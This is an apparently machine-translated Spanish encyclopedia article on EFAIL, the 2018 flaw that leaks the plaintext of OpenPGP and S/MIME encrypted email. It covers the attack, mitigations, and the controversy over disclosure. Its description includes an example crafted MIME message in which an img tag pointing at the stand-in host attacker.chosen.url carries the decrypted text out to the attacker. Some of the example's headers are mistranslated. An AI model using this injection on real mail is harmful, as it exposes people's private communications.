Articulo de referencia

EFAIL

El logotipo del equipo que anunció la vulnerabilidad representa metafóricamente el texto plano que se filtra de un "sobre" de cifrado. Efail , también escrito EFAIL , es una vul...

El logotipo del equipo que anunció la vulnerabilidad representa metafóricamente el texto plano que se filtra de un "sobre" de cifrado.

Efail , también escrito EFAIL , es una vulnerabilidad de seguridad en los sistemas de correo electrónico que permite la transmisión de contenido cifrado . Esta brecha permite a los atacantes acceder al contenido descifrado de un correo electrónico si contiene contenido activo como HTML [ 1 ] o JavaScript , o si la carga de contenido externo está habilitada en el cliente. Entre los clientes de correo electrónico afectados se incluyen Gmail , Apple Mail y Microsoft Outlook . [ 1 ]

Se han publicado dos identificadores comunes de vulnerabilidades y exposiciones (CVE) relacionados: CVE - 2017-17688 y CVE- 2017-17689 . La vulnerabilidad de seguridad fue dada a conocer el 13 de mayo de 2018 por Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky y Jörg Schwenk como parte de una contribución al 27.º Simposio de Seguridad de USENIX , celebrado en Baltimore en agosto de 2018.

Como consecuencia de esta vulnerabilidad, el contenido de un correo electrónico cifrado atacado puede transmitirse al atacante en texto plano mediante un cliente de correo electrónico vulnerable. Las claves de cifrado utilizadas no se divulgan.

Descripción

La vulnerabilidad de seguridad afecta a muchos programas de correo electrónico comunes cuando se utilizan con los sistemas de cifrado OpenPGP y S/MIME . Un atacante necesita acceso al mensaje de correo electrónico atacado en su formato cifrado, así como la capacidad de enviar un correo electrónico a al menos un destinatario habitual del mensaje original. Para explotar esta vulnerabilidad, el atacante modifica el correo electrónico cifrado, lo que provoca que el programa de correo electrónico del destinatario envíe el contenido descifrado al atacante.

Para acceder al contenido descifrado de un correo electrónico cifrado, el atacante modifica el correo electrónico que pretende atacar, añadiendo un texto preparado por él de una manera específica. A continuación, el atacante envía el correo electrónico modificado a uno de los destinatarios habituales.

El atacante inserta texto adicional antes y después del texto cifrado en el correo electrónico cifrado, modificando así el mensaje de manera que se crea un mensaje multipart/mixed (MIME) y la parte cifrada del mensaje aparece junto con las marcas de límite del mensaje MIME como valor de parámetro de una etiqueta HTML.

Ejemplo de un correo electrónico S/MIME modificado:

[...] Content-Type: multipart / mixed ; boundary = "BOUNDARY" [...] --BOUNDARY Content-Type: text / html< img src = "http://attacker.chosen.url/ --BOUNDARY Content-Type: application/pkcs7-mime;  s-mime-typed-envelope-data Content-Transfer-Encoding: base64MENSAJE CIFRADO MENSAJE CIFRADO MENSAJE CIFRADO MENSAJE CIFRADO --LÍMITE Tipo de contenido: texto/html" > --LÍMITE ... 

El cliente de correo electrónico primero divide el mensaje multipartes en sus partes individuales utilizando la --BOUNDARYetiqueta y luego descifra las partes encriptadas. A continuación, vuelve a ensamblar el mensaje multipartes y lo recibe de esta manera:

[...] Content-Type: multipart / mixed ; boundary = "BOUNDARY" [...] --BOUNDARY Content-Type: text / html< img src = "http://attacker.chosen.url/ SECRETMESSAGESECRETMESSAGE" > --LÍMITE ... 

Este mensaje ahora contiene el contenido descifrado del correo electrónico en el src=atributo de la <img>etiqueta y el programa de correo electrónico lo envía como URL al servidor web attacker.chosen.urlcontrolado por el atacante cuando se solicita dicho contenido. El atacante ahora puede recuperar el contenido del mensaje cifrado de los registros de su servidor web.

En una variante del ataque, el atacante aprovecha una vulnerabilidad en los modos de operación CBC (S/MIME) y CFB (OpenPGP) de los algoritmos de cifrado utilizados. Esto le permite modificar el texto cifrado insertando gadgets . Como consecuencia de esta manipulación, el texto original se vuelve ilegible. Si el atacante lo supiera, podría corregirlo insertando gadgets adicionales. También podría ocultar texto desconocido insertando ciertas etiquetas HTML . El resultado es un mensaje con una estructura similar a la descrita anteriormente.

Medidas de mitigación

Dado que la vulnerabilidad está dirigida contra el contenido del correo electrónico y no contra el destinatario, es necesario que todos los destinatarios implementen las contramedidas. Estas incluyen:

  • Desactive el contenido activo, como HTML o JavaScript, al visualizar correos electrónicos.
  • Desactivar la recarga automática de contenido externo, como imágenes.

Aún no se ha aclarado de forma concluyente hasta qué punto incluso los remitentes de contenido cifrado pueden reducir la vulnerabilidad, por ejemplo, mediante firmas electrónicas o la limitación a un subconjunto de formatos MIME.

Crítica

Al anunciar la vulnerabilidad de seguridad el 13 de mayo de 2018, la Electronic Frontier Foundation (EFF) recomendó dejar de usar cualquier complemento PGP en los programas de correo electrónico, aunque la vulnerabilidad no está directamente relacionada con PGP, sino con la configuración del programa. [ 2 ] [ 3 ] Originalmente, se programó una publicación coordinada para el 15 de mayo. La EFF fue criticada por varias partes por ignorar esto. [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ]

Como consecuencia de esto, Robert Hansen recomendó establecer un grupo cerrado o una lista de correo para coordinar mejor la publicación de futuros problemas de seguridad. Aun así, consideró que la EFF y su director, Danny O'Brien, eran la mejor entidad para administrar dicho "Grupo de Divulgación OpenPGP". [ 9 ]

Referencias

  1. 1 2 "Fallos de Efail de hace una década pueden filtrar el texto plano de correos electrónicos cifrados con PGP y S/MIME" . arstechnica.com . 14 de mayo de 2018.
  2. "EFF en Twitter" . Twitter . Electronic Frontier Foundation (EFF). 13 de mayo de 2018. Consultado el 17 de mayo de 2018. Para protegerse, EFF recomienda encarecidamente que, por ahora, desinstale o desactive su complemento de correo electrónico PGP.
  3. O'Brien, Danny ; Gebhart, Gennie (13 de mayo de 2018), Atención usuarios de PGP: las nuevas vulnerabilidades requieren que actúen ahora , Electronic Frontier Foundation (EFF) , consultado el 17 de mayo de 2018.
  4. ^ "Comentario: Efail ist ein EFFail" . heise en línea (en alemán). 2018-05-16 . Consultado el 17 de mayo de 2018 .
  5. "Enigmail-Chefentwickler im Entrevista: Guerra Efail-Veröffentlichung "unüberlegt"" . seguridad heise (en alemán). 2018-05-15 . Consultado el 2018-05-17 .
  6. Koch, Werner (14 de mayo de 2018). "Efail u OpenPGP es más seguro que S/MIME" . gnupg-users . Recuperado el 17 de mayo de 2018 .
  7. Green, Matthew (17 de mayo de 2018). "¿Fue terriblemente desastrosa la divulgación de Efail?" . Algunas reflexiones sobre ingeniería criptográfica . Recuperado el 17 de mayo de 2018 .
  8. «Hashtag #EFFail auf Twitter» (en alemán) . Consultado el 17 de mayo de 2018 .
  9. ^ Hansen, Robert (20 de mayo de 2018). "Efail: una autopsia" . medio.com . Consultado el 21 de mayo de 2018 .

Lecturas adicionales

  • Poddebniak, Damian; Dresen, Christian; Müller, Jens; Ising, Fabian; Schinzel, Sebastian; Friedberger, Simon; Somorovsky, Juraj; Schwenk, Jörg. "Efail: Rompiendo el cifrado de correo electrónico S/MIME y OpenPGP usando canales de exfiltración" (PDF) . Efail.de . Borrador 0.9.1. Archivado (PDF) del original el 21 de mayo de 2018. Recuperado el 14 de mayo de 2018 .
  • Sitio web oficial
Obtenido de " https://en.wikipedia.org/w/index.php?title=EFAIL&oldid=1284298817 "